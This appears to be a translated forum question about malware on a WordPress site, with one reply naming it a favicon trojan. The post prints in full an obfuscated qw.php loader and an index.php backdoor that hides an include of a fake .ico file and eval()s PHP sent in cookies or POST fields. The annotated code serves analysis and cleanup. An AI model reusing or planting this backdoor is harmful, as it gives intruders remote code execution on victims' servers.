WordPress 安装根目录下的 qw.php 文件

时间:2019-02-12 16:41:19

标签: php wordpress malware

我在这里发帖,不仅是为了获得关于这个特定文件的帮助或指导,也是为了让其他人在搜索这个问题时能找到它。

显然,WordPress的安装根目录有一个名为qw.php的文件,该文件不属于标准安装包。

文件内容如下:

<?php
// Loader stub found as qw.php in the WordPress install root (not part of
// WordPress). It carries no plain-text payload: every name it needs is
// rebuilt at runtime from the lookup string below, so a grep for
// "base64_decode" or "create_function" does not match this file. Detection
// has to key on the structure (indexed substitution alphabet, strrev'd
// function name, variable function call) or on the file being foreign to core.

// Substitution alphabet; $ar below is a list of positions into it.
$alphabet  =  ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
// Base64 of the real payload. The line is truncated in this post (no closing
// quote or semicolon). The visible prefix decodes to
// `global $auth_pass,$color,$default_action,$default_u` -- variable names
// consistent with a password-protected PHP web shell; the full body is not
// visible here, so confirm from the recovered file.
$string  = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91$"
$array_name  =  "";
// Positions 4,29,34,38,42,9,21,7,38,17,37,7,38 spell "base64_decode".
$ar  = array(4,29,34,38,42,9,21,7,38,17,37,7,38);

foreach($ar as $t){
   $array_name .= $alphabet[$t];
}

// "noitcnuf_etaerc" reversed is "create_function" (removed in PHP 8.0, so
// this stub only executes on PHP 7.x and older).
$a  =  strrev("noi"."tcnuf"."_eta"."erc");
// create_function("", base64_decode($string)): compiles the decoded payload
// as an anonymous function, i.e. an eval() in disguise ...
$f  =  $a("", $array_name($string));
// ... and runs it. Deleting this one file is not a cleanup: the same
// campaign prepends a loader to index.php files (shown further down), so the
// whole tree needs to be compared against a clean WordPress core.
$f();

我注意到黑客还会修改各文件夹中或安装目录下的 index.php 文件,将以下 PHP 代码添加到这些文件的顶部:

    <?php
/*e5486*/
// Everything between the two /*e5486*/ markers is what gets prepended to
// index.php files. The include path is written with octal escapes so the
// literal never appears in the file; it decodes to
//   /www-data/ANH_USA/petitionhero.org/web/content/.6a99894c.ico
// i.e. a dot-prefixed ".ico" file that actually holds PHP. The @ suppresses
// the warning when that file is missing, so removing the .ico alone leaves
// every patched index.php silently "working" with no error in the logs.
// Both the marker string and the octal-escaped include are usable grep
// signatures for finding the other patched files.

@include "\057www\055dat\141/AN\110_US\101/pe\164iti\157nhe\162o.o\162g/w\145b/c\157nte\156t/.\066a99\07094c\056ico";

// Second stage, placed after the closing marker on the same line and pushed
// far to the right by a long run of spaces so it sits off-screen in most
// editors. One obfuscation scheme is used throughout: $r15a0 is an alias of
// $GLOBALS, 'fd7e1' is a 98-character lookup string, and every function
// name and string literal is assembled by indexing into it. Decoded, it:
//   - stores chr, ord, define, strlen, defined, ini_set, serialize,
//     phpversion, unserialize, base64_decode and set_time_limit in
//     $GLOBALS under random-looking keys, plus copies of $_POST and $_COOKIE;
//   - calls ini_set('error_log', NULL), ini_set('log_errors', 0),
//     ini_set('max_execution_time', 0) and set_time_limit(0), so it leaves
//     no PHP error trail and is not cut off by the execution-time limit;
//   - guards on the constant ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba
//     (the same loader in several included files runs only once) and sets
//     the global $s712c4 to '54f7b2b2-4a8f-4abc-858f-ba6c7e9e1d6f';
//   - defines t4b3d() (a repeating-key XOR) and r4fce08d() (two passes of
//     it, with $s712c4 and then with a caller-supplied key);
//   - takes the last $_COOKIE entry (falling back to the last $_POST entry),
//     base64-decodes it, runs it through r4fce08d() and unserialize()s it;
//   - if the result's 'ak' field == $s712c4 (loose comparison): action 'i'
//     echoes serialize(['pv' => phpversion(), 'sv' => '1.0-1']) as a
//     liveness check, action 'e' eval()s the 'd' field; then exit().
// So a request carrying a correctly encoded cookie or POST field runs
// attacker-supplied PHP inside index.php. This stage itself writes nothing
// to disk and silences errors, so web-server access logs (cookie- or
// POST-bearing requests to index.php that return no page) are where it
// shows up. The ALREADY_RUN_ constant, the key string and the 'fd7e1'
// lookup table are stable signatures for this variant, and unserialize()
// on request data is a review flag on its own.
/*e5486*/                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $tc6d63f = 643;$GLOBALS['r15a0'] = Array();global $r15a0;$r15a0 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['fd7e1'] = "\x63\x4a\x52\x51\x67\x5b\x46\x41\x38\x60\x50\x65\x3e\x7b\x54\x64\x2e\x71\x2a\x75\x56\x7e\x66\x2f\x59\x3d\x6c\x76\x79\x22\x58\x37\x6f\x7a\x3b\x68\x70\x42\x6b\x49\x28\x21\x47\x23\x74\x9\x5f\x77\x4c\x6d\x24\x53\x34\x4b\x45\xd\xa\x44\x2d\x31\x61\x5a\x40\x29\x43\x6e\x57\x3a\x72\x36\x4f\x39\x62\x35\x3f\x7d\x4d\x5c\x73\x69\x26\x5e\x2b\x4e\x48\x6a\x30\x2c\x78\x33\x27\x5d\x7c\x32\x55\x20\x3c\x25";$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]] = $r15a0['fd7e1'][0].$r15a0['fd7e1'][35].$r15a0['fd7e1'][68];$r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]] = $r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]] = 
$r15a0['fd7e1'][78].$r15a0['fd7e1'][44].$r15a0['fd7e1'][68].$r15a0['fd7e1'][26].$r15a0['fd7e1'][11].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]] = $r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][79].$r15a0['fd7e1'][46].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][36].$r15a0['fd7e1'][35].$r15a0['fd7e1'][36].$r15a0['fd7e1'][27].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]] = $r15a0['fd7e1'][19].$r15a0['fd7e1'][65].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]] = 
$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][69].$r15a0['fd7e1'][52].$r15a0['fd7e1'][46].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][32].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][79].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][68].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][0].$r15a0['fd7e1'][11].$r15a0['fd7e1'][86].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][44].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72].$r15a0['fd7e1'][89].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] = $_POST;$r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] = $_COOKIE;@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4], 
NULL);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78], 0);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][49].$r15a0['fd7e1'][60].$r15a0['fd7e1'][88].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][19].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11], 0);@$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]](0);if (!$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60])){$r15a0[$r15a0['fd7e1'][88].$r15a0
['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60], 1);$fd2e3658 = NULL;$l055f1e = NULL;$r15a0[$r15a0['fd7e1'][78].$r15a0['fd7e1'][31].$r15a0['fd7e1'][59].$r15a0['fd7e1'][93].$r15a0['fd7e1'][0].$r15a0['fd7e1'][52]] = $r15a0['fd7e1'][73].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][58].$r15a0['fd7e1'][8].$r15a0['fd7e1'][73].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][69].$r15a0['fd7e1'][0].$r15a0['fd7e1'][31].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][59].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22];global $s712c4;function  t4b3d($fd2e3658, $h0025d){global $r15a0;$abe6301 = "";for ($x3b1d62=0; 
$x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658);){for ($pb0b59=0; $pb0b59<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($h0025d) && $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658); $pb0b59++, $x3b1d62++){$abe6301 .= $r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]]($r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($fd2e3658[$x3b1d62]) ^ $r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($h0025d[$pb0b59]));}}return $abe6301;}function  r4fce08d($fd2e3658, $h0025d){global $r15a0;global $s712c4;return $r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($fd2e3658, $s712c4), $h0025d);}foreach ($r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}if (!$fd2e3658){foreach ($r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}}$fd2e3658 = 
@$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]]($r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]]($r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]]($fd2e3658), $l055f1e));if (isset($fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]) && $s712c4==$fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]){if ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][79]){$x3b1d62 = Array($r15a0['fd7e1'][36].$r15a0['fd7e1'][27] => @$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]](),$r15a0['fd7e1'][78].$r15a0['fd7e1'][27] => $r15a0['fd7e1'][59].$r15a0['fd7e1'][16].$r15a0['fd7e1'][86].$r15a0['fd7e1'][58].$r15a0['fd7e1'][59],);echo @$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]]($x3b1d62);}elseif ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][11]){eval/*k59bce*/($fd2e3658[$r15a0['fd7e1'][15]]);}exit();}} ?>

添加到服务器安装根目录的其他文件:article59.php、dir44.php、onxwylrq.php

有人知道这与哪种恶意软件有关吗?有谁知道该文件是通过被入侵的插件或主题中的哪个位置被植入并连接进来的?

1 个答案:

答案 0 :(得分:1)

您的网站似乎感染了 favicon 木马,因为该脚本的第一行解码后为:

@include "/www-data/ANH_USA/petitionhero.org/web/content/.6a99894c.ico"
  

favicon(.ico)恶意软件会创建流氓的 favicon.ico 或随机命名的 .ico 文件,其中包含恶意 PHP 代码。已知这些恶意 PHP 代码会在网站上执行危险操作,例如 URL 注入、在 WordPress/Drupal 中创建管理员帐户、安装间谍软件/特洛伊木马、创建网络钓鱼页面等。

在此处查看更多详细信息。